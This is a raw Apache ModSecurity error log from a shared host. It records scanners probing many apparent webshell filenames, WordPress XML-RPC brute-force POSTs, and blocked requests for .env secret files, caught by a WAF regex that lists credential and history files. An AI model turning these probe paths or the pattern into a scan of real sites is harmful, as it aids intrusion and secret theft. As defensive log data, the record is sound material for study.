[Tue May 26 16:24:59.508308 2026] [security2:error] [pid 795941:tid 796185] [client 20.48.248.215:23519] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/zoo.php"] [unique_id "ahV8A-2GQ_TLE_VHIp2bLgAAAPc"]
[Tue May 26 16:25:00.019873 2026] [security2:error] [pid 795941:tid 796102] [client 20.48.248.215:14199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/wp-link-spm.php"] [unique_id "ahV8BO2GQ_TLE_VHIp2bNgAAAKQ"]
[Tue May 26 16:25:00.020046 2026] [security2:error] [pid 795941:tid 796102] [client 20.48.248.215:14199] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/wp-link-spm.php"] [unique_id "ahV8BO2GQ_TLE_VHIp2bNgAAAKQ"]
[Tue May 26 16:25:00.118505 2026] [security2:error] [pid 795941:tid 796178] [client 146.174.168.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Au2GQ_TLE_VHIp2bEgAAAPA"]
[Tue May 26 16:25:00.194095 2026] [security2:error] [pid 795941:tid 796133] [client 184.154.139.45:60048] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/wpforms-lite/readme.txt"] [unique_id "ahV8BO2GQ_TLE_VHIp2bOgAAAMM"]
[Tue May 26 16:25:00.717312 2026] [security2:error] [pid 795941:tid 796167] [client 184.154.139.45:60180] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/cgi-sys/404.html"] [unique_id "ahV8BO2GQ_TLE_VHIp2bUAAAAOU"]
[Tue May 26 16:25:00.719117 2026] [security2:error] [pid 795941:tid 796123] [client 104.210.140.141:30993] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "blettclms.com"] [uri "/index.php/robots.txt"] [unique_id "ahV8BO2GQ_TLE_VHIp2bTwAAuWs"]
[Tue May 26 16:25:00.778950 2026] [security2:error] [pid 795941:tid 796088] [client 20.48.248.215:63769] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/sallu.php"] [unique_id "ahV8BO2GQ_TLE_VHIp2bUQAAAJY"]
[Tue May 26 16:25:00.779079 2026] [security2:error] [pid 795941:tid 796088] [client 20.48.248.215:63769] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/sallu.php"] [unique_id "ahV8BO2GQ_TLE_VHIp2bUQAAAJY"]
[Tue May 26 16:25:00.894174 2026] [security2:error] [pid 795941:tid 796148] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8A-2GQ_TLE_VHIp2bNQAAANI"]
[Tue May 26 16:25:01.077027 2026] [security2:error] [pid 795941:tid 796166] [client 20.48.248.215:21181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/wp-link-snpm.php"] [unique_id "ahV8Be2GQ_TLE_VHIp2bVgAAAOQ"]
[Tue May 26 16:25:01.077122 2026] [security2:error] [pid 795941:tid 796166] [client 20.48.248.215:21181] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/wp-link-snpm.php"] [unique_id "ahV8Be2GQ_TLE_VHIp2bVgAAAOQ"]
[Tue May 26 16:25:02.072910 2026] [security2:error] [pid 795941:tid 796189] [client 20.48.248.215:63776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/ng.php"] [unique_id "ahV8Bu2GQ_TLE_VHIp2bdAAAAPs"]
[Tue May 26 16:25:02.073032 2026] [security2:error] [pid 795941:tid 796189] [client 20.48.248.215:63776] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/ng.php"] [unique_id "ahV8Bu2GQ_TLE_VHIp2bdAAAAPs"]
[Tue May 26 16:25:02.528106 2026] [proxy:error] [pid 795941:tid 796148] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:25:02.528165 2026] [proxy_http:error] [pid 795941:tid 796148] [client 205.210.31.34:64958] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:25:02.528758 2026] [proxy:error] [pid 795941:tid 796148] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:25:02.528789 2026] [proxy_http:error] [pid 795941:tid 796148] [client 205.210.31.34:64958] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:25:02.598035 2026] [security2:error] [pid 795941:tid 796144] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Be2GQ_TLE_VHIp2bZQAAAM4"]
[Tue May 26 16:25:02.912262 2026] [security2:error] [pid 795941:tid 796166] [client 20.48.248.215:63719] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/link.php"] [unique_id "ahV8Bu2GQ_TLE_VHIp2bhwAAAOQ"]
[Tue May 26 16:25:02.912354 2026] [security2:error] [pid 795941:tid 796166] [client 20.48.248.215:63719] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/link.php"] [unique_id "ahV8Bu2GQ_TLE_VHIp2bhwAAAOQ"]
[Tue May 26 16:25:03.472006 2026] [security2:error] [pid 795941:tid 796086] [client 20.48.248.215:63794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/xxx.php"] [unique_id "ahV8B-2GQ_TLE_VHIp2bkwAAAJQ"]
[Tue May 26 16:25:03.472147 2026] [security2:error] [pid 795941:tid 796086] [client 20.48.248.215:63794] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/xxx.php"] [unique_id "ahV8B-2GQ_TLE_VHIp2bkwAAAJQ"]
[Tue May 26 16:25:03.909397 2026] [security2:error] [pid 795941:tid 796178] [client 66.249.64.166:61711] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahV8Be2GQ_TLE_VHIp2bYgAAAPA"], referer: http://doyecpa.com/prizes/268569834%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 16:25:04.354328 2026] [security2:error] [pid 795941:tid 796159] [client 20.48.248.215:64407] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/BDKR28WP.php"] [unique_id "ahV8CO2GQ_TLE_VHIp2bogAAAN0"]
[Tue May 26 16:25:04.354438 2026] [security2:error] [pid 795941:tid 796159] [client 20.48.248.215:64407] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/BDKR28WP.php"] [unique_id "ahV8CO2GQ_TLE_VHIp2bogAAAN0"]
[Tue May 26 16:25:04.857581 2026] [security2:error] [pid 795941:tid 796174] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8B-2GQ_TLE_VHIp2bkgAAAOw"]
[Tue May 26 16:25:05.347359 2026] [security2:error] [pid 795941:tid 796193] [client 68.183.88.172:45520] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "thedebateafrica.org"] [uri "/"] [unique_id "ahV8Ce2GQ_TLE_VHIp2bsgAAAP8"]
[Tue May 26 16:25:06.459383 2026] [security2:error] [pid 795941:tid 796084] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Ce2GQ_TLE_VHIp2bxwAAAJI"]
[Tue May 26 16:25:07.204575 2026] [security2:error] [pid 795941:tid 796085] [client 20.48.248.215:63703] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/edit.php"] [unique_id "ahV8C-2GQ_TLE_VHIp2b5wAAAJM"]
[Tue May 26 16:25:07.204668 2026] [security2:error] [pid 795941:tid 796085] [client 20.48.248.215:63703] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/edit.php"] [unique_id "ahV8C-2GQ_TLE_VHIp2b5wAAAJM"]
[Tue May 26 16:25:08.561422 2026] [security2:error] [pid 795941:tid 796079] [client 20.48.248.215:63700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/pp.php"] [unique_id "ahV8DO2GQ_TLE_VHIp2cEAAAAI0"]
[Tue May 26 16:25:08.561531 2026] [security2:error] [pid 795941:tid 796079] [client 20.48.248.215:63700] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/pp.php"] [unique_id "ahV8DO2GQ_TLE_VHIp2cEAAAAI0"]
[Tue May 26 16:25:08.621009 2026] [security2:error] [pid 795941:tid 796187] [client 20.48.248.215:14140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/xminie.php"] [unique_id "ahV8DO2GQ_TLE_VHIp2cEgAAAPk"]
[Tue May 26 16:25:08.621143 2026] [security2:error] [pid 795941:tid 796187] [client 20.48.248.215:14140] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/xminie.php"] [unique_id "ahV8DO2GQ_TLE_VHIp2cEgAAAPk"]
[Tue May 26 16:25:08.732826 2026] [security2:error] [pid 795941:tid 796135] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8DO2GQ_TLE_VHIp2b_QAAAMU"]
[Tue May 26 16:25:08.896364 2026] [security2:error] [pid 795941:tid 796096] [client 20.48.248.215:64977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/one.php"] [unique_id "ahV8DO2GQ_TLE_VHIp2cGgAAAJ4"]
[Tue May 26 16:25:08.896471 2026] [security2:error] [pid 795941:tid 796096] [client 20.48.248.215:64977] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/one.php"] [unique_id "ahV8DO2GQ_TLE_VHIp2cGgAAAJ4"]
[Tue May 26 16:25:10.636861 2026] [security2:error] [pid 795941:tid 796148] [client 20.48.248.215:64961] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/error_log.php"] [unique_id "ahV8Du2GQ_TLE_VHIp2cOwAAANI"]
[Tue May 26 16:25:10.636985 2026] [security2:error] [pid 795941:tid 796148] [client 20.48.248.215:64961] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/error_log.php"] [unique_id "ahV8Du2GQ_TLE_VHIp2cOwAAANI"]
[Tue May 26 16:25:10.803586 2026] [security2:error] [pid 795941:tid 796174] [client 20.48.248.215:14121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/bal.php"] [unique_id "ahV8Du2GQ_TLE_VHIp2cPAAAAOw"]
[Tue May 26 16:25:10.803720 2026] [security2:error] [pid 795941:tid 796174] [client 20.48.248.215:14121] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/bal.php"] [unique_id "ahV8Du2GQ_TLE_VHIp2cPAAAAOw"]
[Tue May 26 16:25:10.972212 2026] [security2:error] [pid 795941:tid 796071] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Du2GQ_TLE_VHIp2cLQAAAIU"]
[Tue May 26 16:25:11.688859 2026] [security2:error] [pid 795941:tid 796147] [client 20.48.248.215:64989] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/roksad1.php"] [unique_id "ahV8D-2GQ_TLE_VHIp2cXgAAANE"]
[Tue May 26 16:25:11.688997 2026] [security2:error] [pid 795941:tid 796147] [client 20.48.248.215:64989] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/roksad1.php"] [unique_id "ahV8D-2GQ_TLE_VHIp2cXgAAANE"]
[Tue May 26 16:25:12.388806 2026] [security2:error] [pid 795941:tid 796169] [client 74.7.242.129:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahV8EO2GQ_TLE_VHIp2ccgAAAOc"], referer: https://www.kardashevtechnologies.com/project/
[Tue May 26 16:25:12.511014 2026] [security2:error] [pid 795941:tid 796160] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8D-2GQ_TLE_VHIp2cYQAAAN4"]
[Tue May 26 16:25:13.310249 2026] [security2:error] [pid 795941:tid 796180] [client 20.48.248.215:64325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/axe.php"] [unique_id "ahV8Ee2GQ_TLE_VHIp2ckgAAAPI"]
[Tue May 26 16:25:13.310345 2026] [security2:error] [pid 795941:tid 796180] [client 20.48.248.215:64325] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/axe.php"] [unique_id "ahV8Ee2GQ_TLE_VHIp2ckgAAAPI"]
[Tue May 26 16:25:13.364587 2026] [security2:error] [pid 795941:tid 796156] [client 104.194.153.222:53149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 222.153.194.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV8Ee2GQ_TLE_VHIp2ckQAAANo"], referer: https://www.cagmedya.com/kahramanmaras-web-tasarim/
[Tue May 26 16:25:13.364733 2026] [security2:error] [pid 795941:tid 796156] [client 104.194.153.222:53149] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV8Ee2GQ_TLE_VHIp2ckQAAANo"], referer: https://www.cagmedya.com/kahramanmaras-web-tasarim/
[Tue May 26 16:25:14.074887 2026] [security2:error] [pid 795941:tid 796120] [client 20.48.248.215:14118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.rathnaa.co.in"] [uri "/drykl.php"] [unique_id "ahV8Eu2GQ_TLE_VHIp2crAAAALY"]
[Tue May 26 16:25:14.074999 2026] [security2:error] [pid 795941:tid 796120] [client 20.48.248.215:14118] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.rathnaa.co.in"] [uri "/drykl.php"] [unique_id "ahV8Eu2GQ_TLE_VHIp2crAAAALY"]
[Tue May 26 16:25:14.410250 2026] [security2:error] [pid 795941:tid 796173] [client 20.48.248.215:63750] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dglmmm.org.in"] [uri "/de.php"] [unique_id "ahV8Eu2GQ_TLE_VHIp2cwQAAAOs"]
[Tue May 26 16:25:14.410346 2026] [security2:error] [pid 795941:tid 796173] [client 20.48.248.215:63750] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dglmmm.org.in"] [uri "/de.php"] [unique_id "ahV8Eu2GQ_TLE_VHIp2cwQAAAOs"]
[Tue May 26 16:25:14.466595 2026] [security2:error] [pid 795941:tid 796092] [client 104.194.153.222:53220] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV8Eu2GQ_TLE_VHIp2cvgAAAJo"], referer: https://www.cagmedya.com/kahramanmaras-web-tasarim/
[Tue May 26 16:25:14.753785 2026] [security2:error] [pid 795941:tid 796133] [client 104.23.221.171:12753] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "paqys.com"] [uri "/index.php"] [unique_id "ahV8Eu2GQ_TLE_VHIp2cqwAAAMM"]
[Tue May 26 16:25:15.261597 2026] [security2:error] [pid 795941:tid 796169] [client 207.241.173.229:36844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/app/.env"] [unique_id "ahV8E-2GQ_TLE_VHIp2c5QAAAOc"]
[Tue May 26 16:25:15.267992 2026] [security2:error] [pid 795941:tid 796171] [client 207.241.173.229:54440] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/backend/.env"] [unique_id "ahV8E-2GQ_TLE_VHIp2c6QAAAOk"]
[Tue May 26 16:25:15.268498 2026] [security2:error] [pid 795941:tid 796071] [client 207.241.173.229:54424] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/api/.env"] [unique_id "ahV8E-2GQ_TLE_VHIp2c6gAAAIU"]
[Tue May 26 16:25:15.268501 2026] [security2:error] [pid 795941:tid 796182] [client 207.241.173.229:54408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dexterity.taotechservices.com"] [uri "/.env"] [unique_id "ahV8E-2GQ_TLE_VHIp2c7AAAAPQ"]
[Tue May 26 16:25:15.393944 2026] [security2:error] [pid 795941:tid 796094] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8Eu2GQ_TLE_VHIp2cqgAAAJw"]
[Tue May 26 16:25:16.540573 2026] [security2:error] [pid 795941:tid 796149] [client 104.23.221.78:9930] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahV8FO2GQ_TLE_VHIp2dBAAA0wM"]
[Tue May 26 16:25:18.928222 2026] [security2:error] [pid 795941:tid 796119] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8FO2GQ_TLE_VHIp2dDgAAALU"]
